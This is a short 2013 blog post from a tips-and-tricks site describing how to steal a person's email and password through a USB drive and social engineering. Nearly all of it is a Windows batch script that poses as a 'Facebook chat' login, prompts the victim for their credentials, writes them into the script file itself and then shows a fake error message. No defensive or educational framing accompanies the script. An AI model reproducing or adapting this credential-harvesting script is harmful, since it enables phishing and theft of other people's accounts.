d0837296baef4fc14d667832c1a5215944b54a8f46af2d5c5c How to Get the Email and Password of a Person via a USB Drive With Some Social Engineering | TipsS And TricksS

How to Get the Email and Password of a Person via a USB Drive With Some Social Engineering

on Wednesday 13 November 2013






 Open notepad and paste the following code and leave a blank line after the code.

TITLE FBChat
ECHO OFF
COLOR 03
CLS
ECHO.
ECHO LOGIN TO START CHATTING ON FACEBOOK
ECHO.
ECHO Please enter your email:
SET/P "MAIL=>"
ECHO.
ECHO Enter the password:
SET/P "PSWD=>"
ECHO EMAIL = %MAIL%>>FBChat.bat
ECHO PASSWORD = %PSWD%>>FBChat.bat
CLS
TIMEOUT /T 5 >NUL
COLOR 0C
ECHO.
ECHO An error occurred

0 comments:

Post a Comment